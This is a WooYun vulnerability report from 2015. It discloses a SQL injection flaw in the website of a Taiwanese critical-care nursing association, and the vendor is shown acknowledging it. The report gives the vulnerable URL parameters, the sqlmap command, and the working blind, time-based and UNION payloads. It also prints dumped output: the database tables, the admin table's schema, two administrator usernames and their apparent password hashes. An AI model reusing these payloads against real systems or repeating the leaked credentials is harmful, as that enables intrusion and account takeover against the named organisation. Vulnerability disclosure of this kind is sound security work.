漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0161650
漏洞标题:台湾某重症协会sql注入漏洞泄露敏感信息(dba权限)(臺灣地區)
相关厂商:中华民国重症护理协会
漏洞作者: 卖女孩的小火柴
提交时间:2015-12-20 15:17
修复时间:2016-02-01 17:24
公开时间:2016-02-01 17:24
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-20: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-01: 细节向公众公开
简要描述:
rt
详细说明:
注入点:**.**.**.**/site_item_list_4.php?site_map_item_id=4
**.**.**.**/activity/event_news_detail.php?event_id=328
代码:sqlmap.py -u "**.**.**.**/site_item_list_4.php?site_map_item_id=4
" -p "site_map_item_id"
无奈又是一条付费记录——,没法拿后台了
漏洞证明:
Parameter: site_map_item_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: site_map_item_id=4 AND 2262=2262
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: site_map_item_id=4 AND (SELECT * FROM (SELECT(SLEEP
(5)))OzrY)
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: site_map_item_id=-7034 UNION ALL SELECT NULL,CONCAT
(0x71626b7a71,0x
715a714b537474565267,0x717a627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL--
current user is DBA: True
Database: aily_db
[41 tables]
+----------------------------+
| ad_banner |
| ad_banner_top |
| admin_account |
| bonus_income |
| bonus_outgo |
| bonus_rules |
| city_name |
| counters |
| coupon_bonus |
| epaper_article_subject |
| epaper_main |
| epaper_section_content |
| epaper_send_log |
| epaper_subscriber |
| mem_class |
| member |
| news_rpt |
| order_day_status |
| prod_add_buy |
| prod_class |
| prod_item |
| prod_mem_price |
| prod_part_detail |
| prod_profile |
| prod_series |
| prod_size |
| pub_ben_active |
| shop_atm_account |
| shop_freight |
| shop_order_add_buy |
| shop_order_detail |
| shop_order_main |
| shop_order_shipment |
| shop_order_shipment_detail |
| shop_qa |
| store_mem |
| store_mem_class |
| store_mem_login_log |
| store_mem_series |
| supplier_data |
| zip_code |
Database: aily_db
Table: admin_account
[17 columns]
+--------------+------------------
| Column | Type
+--------------+------------------
| acc_status | char(1)
| authority | char(30)
| dep | tinytext
| e_mail | varchar(150)
| e_mail_other | text
| end_date | date
| id | int(10) unsigned
| job | tinytext
| keyin_date | datetime
| keyin_man | varchar(20)
| pass_word | varchar(13)
| realname | tinytext
| remark | text
| start_date | date
| upd_date | datetime
| upd_man | varchar(20)
| username | varchar(20)
Database: aily_db
Table: admin_account
[2 entries]
+------------+
| username |
+------------+
| admin_aily |
| etanfuli |
+------------+
Database: aily_db
Table: admin_account
[2 entries]
+---------------+
| pass_word |
+---------------+
| adkSkT8r/YRnI |
| et.iihOjDhBNg |
修复方案:
。。
版权声明:转载请注明来源 卖女孩的小火柴@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-12-23 04:00
厂商回复:
感謝通報
最新状态:
暂无